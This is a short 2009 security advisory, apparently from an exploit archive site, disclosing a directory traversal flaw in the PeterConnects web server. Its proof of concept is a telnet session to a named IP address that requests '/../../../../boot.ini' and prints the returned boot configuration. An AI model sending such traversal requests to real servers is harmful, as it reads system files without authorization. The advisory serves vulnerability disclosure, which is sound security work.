PeterConnects Web Server Traversal Arbitrary File Access

2009.04.09
Credit: Anon
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

- PeterConnects Web Server Traversal Arbitrary File Access - Description PeterConnects products use a web server that is vulnerable to classic directory traversal (hello 1987) that allows for arbitrary file access. - Product PeterConnects, Unknown Product, Unknown Version (blind external tests not so good for full disclosure) http://www.peter-connects.com/ - PoC $ telnet 205.206.231.15 80 Trying 205.206.231.15... Connected to 205.206.231.15. Escape character is '^]'. GET /../../../../boot.ini HTTP/1.0 HTTP/1.0 200 OK Content-Type: application/octet-stream Content-Length: 303 [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect multi(0)disk(0)rdisk(0)partition(4)\WINDOWS="Microsoft Windows XP Professional" /fastdetect <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> [truncated] - Solution None


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top